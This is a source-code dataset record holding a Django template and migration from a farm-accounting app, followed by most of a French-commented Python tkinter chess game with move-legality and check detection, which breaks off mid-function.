1051, "license_type": "no_license", "max_line_length": 134, "num_lines": 34, "path": "/accountant/templates/accountant/customers.html", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "{% extends 'layouts/base.html' %}\n{% load static %}\n\n{% block content %}\n<div class=\"col-xs-12\">\n<div class=\"card\">\n <div class=\"card-header\">\n <strong>Stocks</strong>\n <a 
class=\"btn btn-success pull-right\" href=\"{% url 'Accountant:add_customer' %}\">New Customer</a>\n </div>\n <div class=\"card-body\">\n <div class=\"table-flip-scroll table-responsive\">\n <table class=\"table table-striped dataTable\">\n <thead>\n <tr>\n <th>Customer Name</th>\n <th>Phone Number</th>\n </tr>\n </thead>\n <tbody>\n {% for customer in customers %}\n <tr>\n <td><a href=\"{% url 'Accountant:sales' customer.id %}\">{{ customer.first_name }} {{ customer.last_name }}</a></td>\n <td>{{ customer.phone_number}}</td>\n </tr>\n {% endfor %}\n </tbody>\n </table>\n\n </div>\n </div>\n</div>\n</div>\n{% endblock %}" }, { "alpha_fraction": 0.5451388955116272, "alphanum_fraction": 0.5666666626930237, "avg_line_length": 29.63829803466797, "blob_id": "96e5764ae9c98910a68749f3dd7e1ff124ce7e78", "content_id": "a80383dda5c87d2190847b43d0c7f0485681c350", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1440, "license_type": "no_license", "max_line_length": 93, "num_lines": 47, "path": "/accountant/migrations/0005_auto_20190526_1836.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-26 18:36\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0004_auto_20190526_1821'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='created_at',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='product',\n name='updated_at',\n field=models.DateTimeField(auto_now=True),\n ),\n migrations.AddField(\n model_name='sale',\n name='created_at',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='sale',\n name='updated_at',\n field=models.DateTimeField(auto_now=True),\n ),\n migrations.AddField(\n model_name='stock',\n name='created_at',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='stock',\n name='updated_at',\n field=models.DateTimeField(auto_now=True),\n ),\n ]\n" } ]
num_files: 15
repo_name: NicoTirel/jeuEchecs
repo_url: https://github.com/NicoTirel/jeuEchecs
snapshot_id: 25557693dd42656c969d268ea63d1d7e39fe5e33
revision_id: 9a76c2340bd729d69ec5c89e1f91748ca847ad21
directory_id: c662e9addbbe6422a8078fe2e6d12233798749e7
branch_name: refs/heads/master
visit_date: 2022-11-07T16:24:10.998698
revision_date: 2019-11-28T13:13:57
committer_date: 2019-11-28T13:13:57
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.5231800079345703, "alphanum_fraction": 0.5529879331588745, "avg_line_length": 36.552486419677734, "blob_id": "44ecfd6bc69c0e6b7f35297bc97c61c2d339d2ec", "content_id": "af1776c8a5169df1036984b407137a7d5f3c97fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27924, "license_type": "no_license", "max_line_length": 423, "num_lines": 724, "path": "/programme.py", "repo_name": "NicoTirel/jeuEchecs", "src_encoding": "UTF-8", "text": "#Projet IA échec (pour coco <3)\r\n\r\nfrom tkinter import *\r\nfrom tkinter.messagebox import *\r\nfrom functools import partial\r\n\r\nroot = Tk()\r\n\r\nroot['bg']='#A4A4A4'\r\nroot.geometry(\"1000x600+10+10\")\r\nroot.title('Jeu d\\'échec')\r\n\r\nechiquier = Canvas(root, width=600, height=600, background='white')\r\nechiquier.pack(side='left')\r\n\r\nposX = 0\r\nposY = 0\r\n\r\njoueur = \"blanc\"\r\n\r\ncapture = False\r\n\r\n\r\n\"\"\"def jouerCoup(case, event):\r\n\tif echiquier.itemcget(CURRENT, 'fill')=='blue':\r\n\t\tx=event.x\r\n\t\ty=event.y\r\n\t\tX = (x-44)//64\r\n\t\tY = (y-44)//64\r\n\t\tpos = lirePosition()\r\n\t\tif coupAutorise(pieceSelect, posX, posY, X, Y) :\r\n\t\t\techiquier.coords(CURRENT, X*64+32+marge, Y*64+32+marge, X*64+32+marge, Y*64+32+marge)\r\n\t\t\techiquier.update()\r\n\t\t\t#pos = lirePosition()\r\n\t\t\t#print(pos==position)\r\n\t\t\t#marquerCoup(position, pos)\r\n\t\t\t#print(coups)\r\n\t\t\tposition = pos\r\n\t\t\tif joueur==\"blanc\":\r\n\t\t\t\tjoueur=\"noir\"\r\n\t\t\telse:\r\n\t\t\t\tjoueur=\"blanc\"\r\n\t\telse:\r\n\t\t\techiquier.coords(CURRENT, posX*64+32+marge, posY*64+32+marge, posX*64+32+marge, posY*64+32+marge)\r\n\t\t\techiquier.update()\"\"\"\r\n\r\ndef casesEchiquier(couleur, lat, longi): #lat : lettres et longi : chiffres\r\n\tglobal cases\r\n\tcases = []\r\n\tnbrecases = 0\r\n\tcases.append(echiquier.create_rectangle(lat, longi, lat+64, longi+64, fill=couleur, tags='cases'))\r\n\t#echiquier.tag_bind(cases[nbrecases], '<Button-1>', partial(jouerCoup, nbrecases))\r\n\tif couleur==\"lightgray\" and lat!=64*7+marge:\r\n\t\tcouleur=\"white\"\r\n\telif couleur==\"white\" and lat!=64*7+marge:\r\n\t\tcouleur=\"lightgray\"\r\n\tif lat==64*7+marge:\r\n\t\tlat=marge\r\n\t\tlongi+=64\r\n\telse:\r\n\t\tlat+=64\r\n\tif lat!=marge or longi!=512+marge:\r\n\t\tcasesEchiquier(couleur, lat, longi)\r\n\tnbrecases+=1\r\n\r\nmarge = 44\r\ncasesEchiquier(\"white\", marge, marge)\r\n\r\ntourN = PhotoImage(file=\"images/tourN.png\")\r\ncavalierN = PhotoImage(file=\"images/cavalierN.png\")\r\nfouN = PhotoImage(file=\"images/fouN.png\")\r\ndameN = PhotoImage(file=\"images/dameN.png\")\r\nroiN = PhotoImage(file=\"images/roiN.png\")\r\npionN = PhotoImage(file=\"images/pionN.png\")\r\ntourB = PhotoImage(file=\"images/tourB.png\")\r\ncavalierB = PhotoImage(file=\"images/cavalierB.png\")\r\nfouB = PhotoImage(file=\"images/fouB.png\")\r\ndameB = PhotoImage(file=\"images/dameB.png\")\r\nroiB = PhotoImage(file=\"images/roiB.png\")\r\npionB = PhotoImage(file=\"images/pionB.png\")\r\n\r\n\r\npartie = Canvas(root, width=380, height=600, background='white')\r\npartie.pack(side='right')\r\n\r\ndef placerPieces():\r\n\tglobal nbrepieces, pieces\r\n\tnbrepieces = 0\r\n\tpieces = []\r\n\tcentre = marge + 32\r\n\tfor ligne in range(0, 8):\r\n\t\tfor colonne in range(0, 8):\r\n\t\t\tif position[ligne][colonne] == \"tourN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=tourN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] 
== \"cavalierN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=cavalierN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"fouN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=fouN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"dameN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=dameN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"roiN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=roiN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"pionN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=pionN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"tourB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=tourB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"cavalierB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=cavalierB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"fouB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=fouB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"dameB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=dameB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"roiB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=roiB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"pionB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=pionB, tags=\"piecesB\"))\r\n\t\t\tif position[ligne][colonne] != \"R\":\r\n\t\t\t\techiquier.tag_bind(pieces[nbrepieces], '<Button-1>', partial(positionDepart, nbrepieces))\r\n\t\t\t\techiquier.tag_bind(pieces[nbrepieces], '<B1-Motion>', partial(deplacerPieces, nbrepieces))\r\n\t\t\t\techiquier.tag_bind(pieces[nbrepieces], '<B1-ButtonRelease>', partial(relacherPieces, nbrepieces))\r\n\t\t\t\tnbrepieces+=1\r\n\r\n\"\"\"def lirePosition():\r\n\tglobal position, coups\r\n\tfor ligne in range(0,8):\r\n\t\tfor colonne in range(0,8):\r\n\t\t\ttag = echiquier.find_closest(colonne*64+32+marge, ligne*64+32+marge)[0]\r\n\t\t\tif tag<=64:\r\n\t\t\t\tposition[ligne][colonne] = \"R\"\r\n\t\t\telse:\r\n\t\t\t\tif (tag==65 or tag==72) and position[ligne][colonne] != \"tourN\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"tourN\"\r\n\t\t\t\t\tcoups.append((\"T\", False, colonne, ligne))\r\n\t\t\t\telif (tag==66 or tag==71) and position[ligne][colonne] != \"cavalierN\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"cavalierN\"\r\n\t\t\t\t\tcoups.append((\"C\", False, colonne, ligne))\r\n\t\t\t\telif (tag==67 or tag==70) and position[ligne][colonne] != \"fouN\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"fouN\"\r\n\t\t\t\t\tcoups.append((\"F\", False, colonne, ligne))\r\n\t\t\t\telif tag==68 and position[ligne][colonne] != \"dameN\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"dameN\"\r\n\t\t\t\t\tcoups.append((\"D\", False, colonne, ligne))\r\n\t\t\t\telif tag==69 and position[ligne][colonne] != \"roiN\": \r\n\t\t\t\t\tposition[ligne][colonne] = \"roiN\"\r\n\t\t\t\t\tcoups.append((\"R\", False, colonne, ligne))\r\n\t\t\t\telif (tag>=73 and tag<=80) and position[ligne][colonne] != \"pionN\":\r\n\t\t\t\t\tposition[ligne][colonne] = 
\"pionN\"\r\n\t\t\t\t\tcoups.append((\"P\", False, colonne, ligne))\r\n\t\t\t\telif (tag==89 or tag==96) and position[ligne][colonne] != \"tourB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"tourB\"\r\n\t\t\t\t\tcoups.append((\"T\", False, colonne, ligne))\r\n\t\t\t\telif (tag==90 or tag==95) and position[ligne][colonne] != \"cavalierB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"cavalierB\"\r\n\t\t\t\t\tcoups.append((\"C\", False, colonne, ligne))\r\n\t\t\t\telif (tag==91 or tag==94) and position[ligne][colonne] != \"fouB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"fouB\"\r\n\t\t\t\t\tcoups.append((\"F\", False, colonne, ligne))\r\n\t\t\t\telif tag==92 and position[ligne][colonne] != \"dameB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"dameB\"\r\n\t\t\t\t\tcoups.append((\"D\", False, colonne, ligne))\r\n\t\t\t\telif tag==93 and position[ligne][colonne] != \"roiB\": \r\n\t\t\t\t\tposition[ligne][colonne] = \"roiB\"\r\n\t\t\t\t\tcoups.append((\"R\", False, colonne, ligne))\r\n\t\t\t\telif (tag>=81 and tag<=88) and position[ligne][colonne] != \"pionB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"pionB\"\r\n\t\t\t\t\tcoups.append((\"P\", False, colonne, ligne))\"\"\"\r\n\r\ndef positionDepart(piece, event):\r\n\tglobal posX, posY, pieceSelect\r\n\tposX = (event.x-44)//64\r\n\tposY = (event.y-44)//64\r\n\t\"\"\"for x in range(0,8):\r\n\t\tfor y in range(0,8):\r\n\t\t\tif coupAutorise(piece, posX, posY, x, y):\r\n\t\t\t\tprint(\"testA\",x, y)\r\n\t\t\t\tcase = echiquier.find_withtag(\"cases\")[y*8+x]\r\n\t\t\t\techiquier.itemconfig(case, fill=\"blue\")\r\n\t\t\t\tpieceSelect = piece\"\"\"\r\n\r\n\r\ndef deplacerPieces(piece, event):\r\n x=event.x\r\n y=event.y\r\n echiquier.coords(CURRENT,x,y)\r\n echiquier.update()\r\n\r\ndef relacherPieces(piece, event):\r\n\tglobal joueur, position, nbreCoups, coups, capture\r\n\tx=event.x\r\n\ty=event.y\r\n\tX = (x-44)//64\r\n\tY = (y-44)//64\r\n\tif X<0 or X>7 or Y<0 or Y>7 or (X==posX and Y==posY):\t\t#pour que les pièces ne débordent pas de l'échiquier ou que le joueur ne reste pas sur place\r\n\t\techiquier.coords(CURRENT, posX*64+32+marge, posY*64+32+marge)\r\n\t\techiquier.update()\r\n\telse:\r\n\t\tposiTemp = position[Y][X]\r\n\t\tposition[Y][X] = position[posY][posX]\r\n\t\tposition[posY][posX] = \"R\"\r\n\t\tif coupLegal():\r\n\t\t\tposition[posY][posX] = position[Y][X]\r\n\t\t\tposition[Y][X] = posiTemp\r\n\t\t\tif coupAutorise(piece, posX, posY, X, Y):\r\n\t\t\t\tposition[Y][X] = position[posY][posX]\r\n\t\t\t\tposition[posY][posX] = \"R\"\r\n\t\t\t\tcoups.append((position[Y][X][0], capture, posX, posY, X, Y))\r\n\t\t\t\tcapture = False\r\n\t\t\t\techiquier.coords(CURRENT, X*64+32+marge, Y*64+32+marge)\r\n\t\t\t\techiquier.update()\r\n\t\t\t\tif joueur==\"blanc\":\r\n\t\t\t\t\tjoueur=\"noir\"\r\n\t\t\t\telse:\r\n\t\t\t\t\tjoueur=\"blanc\"\r\n\t\t\t\tif not(coupLegal()):\r\n\t\t\t\t\tshowwarning('Alerte!', 'Echec! 
:)')\r\n\t\t\telse:\r\n\t\t\t\techiquier.coords(CURRENT, posX*64+32+marge, posY*64+32+marge)\r\n\t\t\t\techiquier.update()\r\n\t\telse:\r\n\t\t\tposition[posY][posX] = position[Y][X]\r\n\t\t\tposition[Y][X] = posiTemp\r\n\t\t\techiquier.coords(CURRENT, posX*64+32+marge, posY*64+32+marge)\r\n\t\t\techiquier.update()\r\n\r\ndef capturePiece(X, Y):\r\n\tglobal capture\r\n\tpiece = echiquier.find_enclosed(X*64+32+marge-32, Y*64+32+marge-32, X*64+32+marge+32, Y*64+32+marge+32)[0] #detecte la piece aux coords X, Y\r\n\techiquier.delete(piece)\r\n\tcapture = True\r\n\tprint(\"done!\")\r\n\r\ndef coupLegal():\r\n\tx = 0\r\n\ty = 0\r\n\tdanger = False\r\n\tif joueur==\"blanc\":\r\n\t\t####Première étape, trouver le roi####\r\n\t\twhile y<=7 and position[y][x] != \"roiB\":\r\n\t\t\tx += 1\r\n\t\t\tif x==8:\r\n\t\t\t\tx=0\r\n\t\t\t\ty+=1\r\n\t\tif y==8:\r\n\t\t\tprint(position)\r\n\t\t\tprint(\"Erreur\")\r\n\t\t\treturn True\r\n\r\n\t\t####Scanne la ligne####\r\n\t\tif x!=0:\r\n\t\t\tfor i in range(0, x):\r\n\t\t\t\tif position[y][i] == \"tourN\" or position[y][i] == \"dameN\" or (position[y][i] == \"roiN\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x != 7:\r\n\t\t\tx1=x+1\r\n\t\t\twhile x1<=7 and position[y][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif x1!=8 and (position[y][x1] == \"dameN\" or position[y][x1] == \"tourN\" or (position[y][x1] == \"roiN\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne la colonne####\r\n\t\tif y!=0:\r\n\t\t\tfor i in range(0, y):\r\n\t\t\t\tif position[i][x] == \"tourN\" or position[i][x] == \"dameN\" or (position[i][x] == \"roiN\" and i==y-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[i][x] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif y != 7:\r\n\t\t\ty1 = y+1\r\n\t\t\twhile y1<=7 and position[y1][x] == \"R\":\r\n\t\t\t\ty1+=1\r\n\t\t\tif y1!=8 and (position[y1][x] == \"dameN\" or position[y1][x] == \"tourN\" or (position[y1][x] == \"roiN\" and y1==y+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne la diagonale####\r\n\t\tif x!=0 and y!=0:\r\n\t\t\tif x>y:\r\n\t\t\t\tdebut = x-y\r\n\t\t\telse:\r\n\t\t\t\tdebut = 0\r\n\t\t\tfor i in range(debut, x):\r\n\t\t\t\tif position[y-x+i][i] == \"fouN\" or position[y-x+i][i] == \"dameN\" or (position[y-x+i][i] == \"roiN\" and i==x-1) or (position[y-x+i][i] == \"pionN\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y-x+i][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x!=7 and y!=7:\r\n\t\t\tx1 = x+1\r\n\t\t\twhile y-x+x1<=7 and x1<=7 and position[y-x+x1][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif y-x+x1!=8 and x1!=8 and (position[y-x+x1][x1] == \"fouN\" or position[y-x+x1][x1] == \"dameN\" or (position[y-x+x1][x1] == \"roiN\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne l'autre diagonale####\r\n\t\tif x!=0 and y!=7:\r\n\t\t\tif y+x>7:\r\n\t\t\t\tdebut = y+x-7\r\n\t\t\telse:\r\n\t\t\t\tdebut = 0\r\n\t\t\tfor i in range(debut, x):\r\n\t\t\t\tif position[y+x-i][i] == \"fouN\" or position[y+x-i][i] == \"dameN\" or (position[y+x-i][i] == \"roiN\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y+x-i][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x!=7 and y!=0:\r\n\t\t\tx1 = x+1\r\n\t\t\twhile y+x-x1>=0 and x1<=7 and position[y+x-x1][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif y+x-x1!=-1 and 
x1!=8 and (position[y+x-x1][x1] == \"fouN\" or position[y+x-x1][x1] == \"dameN\" or (position[y+x-x1][x1] == \"roiN\" and x1==x+1) or (position[y+x-x1][x1] == \"pionN\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\t\t####Scanne le cavalier#####\r\n\t\tif y>=2 and x<=6 and position[y-2][x+1] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y>=1 and x<=5 and position[y-1][x+2] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y<=6 and x<=5 and position[y+1][x+2] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y<=5 and x<=6 and position[y+2][x+1] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y<=5 and x>=1 and position[y+2][x-1] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y<=6 and x>=2 and position[y+1][x-2] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y>=1 and x>=2 and position[y-1][x-2] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y>=2 and x>=1 and position[y-2][x-1] == \"cavalierN\":\r\n\t\t\treturn False\r\n\r\n\r\n\telif joueur==\"noir\":\r\n\t\t####Première étape, trouver le roi####\r\n\t\twhile y<=7 and position[y][x] != \"roiN\":\r\n\t\t\tx += 1\r\n\t\t\tif x==8:\r\n\t\t\t\tx=0\r\n\t\t\t\ty+=1\r\n\t\tif y==8:\r\n\t\t\tprint(position)\r\n\t\t\tprint(\"Erreur\")\r\n\t\t\treturn True\r\n\r\n\t\t####Scanne la ligne####\r\n\t\tif x!=0:\r\n\t\t\tfor i in range(0, x):\r\n\t\t\t\tif position[y][i] == \"tourB\" or position[y][i] == \"dameB\" or (position[y][i] == \"roiB\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x != 7:\r\n\t\t\tx1=x+1\r\n\t\t\twhile x1<=7 and position[y][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif x1!=8 and (position[y][x1] == \"dameB\" or position[y][x1] == \"tourB\" or (position[y][x1] == \"roiB\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne la colonne####\r\n\t\tif y!=0:\r\n\t\t\tfor i in range(0, y):\r\n\t\t\t\tif position[i][x] == \"tourB\" or position[i][x] == \"dameB\" or (position[i][x] == \"roiB\" and i==y-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[i][x] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif y != 7:\r\n\t\t\ty1 = y+1\r\n\t\t\twhile y1<=7 and position[y1][x] == \"R\":\r\n\t\t\t\ty1+=1\r\n\t\t\tif y1!=8 and (position[y1][x] == \"dameB\" or position[y1][x] == \"tourB\" or (position[y1][x] == \"roiB\" and y1==y+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne la diagonale####\r\n\t\tif x!=0 and y!=0:\r\n\t\t\tif x>y:\r\n\t\t\t\tdebut = x-y\r\n\t\t\telse:\r\n\t\t\t\tdebut = 0\r\n\t\t\tfor i in range(debut, x):\r\n\t\t\t\tif position[y-x+i][i] == \"fouB\" or position[y-x+i][i] == \"dameB\" or (position[y-x+i][i] == \"roiB\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y-x+i][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x!=7 and y!=7:\r\n\t\t\tx1 = x+1\r\n\t\t\twhile y-x+x1<=7 and x1<=7 and position[y-x+x1][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif y-x+x1!=8 and x1!=8 and (position[y-x+x1][x1] == \"fouB\" or position[y-x+x1][x1] == \"dameB\" or (position[y-x+x1][x1] == \"roiB\" and x1==x+1) or (position[y-x+x1][x1] == \"pionB\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne l'autre diagonale####\r\n\t\tif x!=0 and y!=7:\r\n\t\t\tif y+x>7:\r\n\t\t\t\tdebut = y+x-7\r\n\t\t\telse:\r\n\t\t\t\tdebut = 0\r\n\t\t\tfor i in range(debut, x):\r\n\t\t\t\tif position[y+x-i][i] == \"fouB\" or position[y+x-i][i] == \"dameB\" or (position[y+x-i][i] == \"roiB\" and 
i==x-1) or (position[y+x-i][i] == \"pionB\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y+x-i][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x!=7 and y!=0:\r\n\t\t\tx1 = x+1\r\n\t\t\twhile y+x-x1>=0 and x1<=7 and position[y+x-x1][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif y+x-x1!=-1 and x1!=8 and (position[y+x-x1][x1] == \"fouB\" or position[y+x-x1][x1] == \"dameB\" or (position[y+x-x1][x1] == \"roiB\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\t\t####Scanne le cavalier#####\r\n\t\tif y>=2 and x<=6 and position[y-2][x+1] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y>=1 and x<=5 and position[y-1][x+2] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y<=6 and x<=5 and position[y+1][x+2] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y<=5 and x<=6 and position[y+2][x+1] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y<=5 and x>=1 and position[y+2][x-1] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y<=6 and x>=2 and position[y+1][x-2] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y>=1 and x>=2 and position[y-1][x-2] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y>=2 and x>=1 and position[y-2][x-1] == \"cavalierB\":\r\n\t\t\treturn False\r\n\r\n\r\n\treturn True\r\n\r\n\r\n\r\ndef coupAutorise(piece, posX, posY, X, Y):\r\n#----------------------------------------------------Trait aux blancs----------------------------------------------------#\r\n#\r\n#\r\n\tif piece>15 and piece<=31:\r\n\t\tif joueur == \"noir\":\r\n\t\t\t#showwarning(\"Alerte\", \"C'est aux noirs de jouer\") #showwarning/showerror à voir ###Showwarning fait buguer echiquier.coords ???\r\n\t\t\treturn False\r\n\t\telse:\r\n\r\n###################################################TOUR BLANCHE#########################################################\r\n\r\n\t\t\tif piece==24 or piece==31:\r\n\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X] == \"R\":\r\n\t\t\t\t\treturn X==posX or Y==posY\r\n\t\t\t\telif position[Y][X][-1] == \"N\" and (X==posX or Y==posY):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn False\r\n\r\n###################################################CAVALIER BLANC#######################################################\r\n\r\n\t\t\telif piece==25 or piece==30:\r\n\t\t\t\tif position[Y][X] == \"R\":\r\n\t\t\t\t\treturn (abs(posX-X)==2 and abs(posY-Y)==1) or (abs(posX-X)==1 and abs(posY-Y)==2)\r\n\t\t\t\telif position[Y][X][-1] == \"N\":\r\n\t\t\t\t\tif (abs(posX-X)==2 and abs(posY-Y)==1) or (abs(posX-X)==1 and abs(posY-Y)==2):\r\n\t\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn False\r\n\r\n###################################################FOU BLANC############################################################\r\n\r\n\t\t\telif piece==26 or piece==29:\r\n\t\t\t\tif (X>posX and Y>posY) or (X<posX and Y<posY):\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t#print(ligne, colonne, ligne-min(posY,Y), colonne-min(posX,X), position[ligne][colonne], \"\\n\")\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and 
(ligne-min(posY,Y)==colonne-min(posX,X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t#print(ligne, colonne, ligne+colonne, max(posY, Y)+min(posX, X), position[ligne][colonne], \"\\n\")\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne+colonne==max(posY, Y)+min(posX, X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X][-1] == \"N\" and abs(posX-X)==abs(posY-Y):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn position[Y][X] == \"R\" and abs(posX-X)==abs(posY-Y)\r\n\r\n###################################################DAME BLANCHE##########################################################\r\n\r\n\t\t\telif piece==27:\r\n\t\t\t\tif (X==posX or Y==posY):\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tif (X>posX and 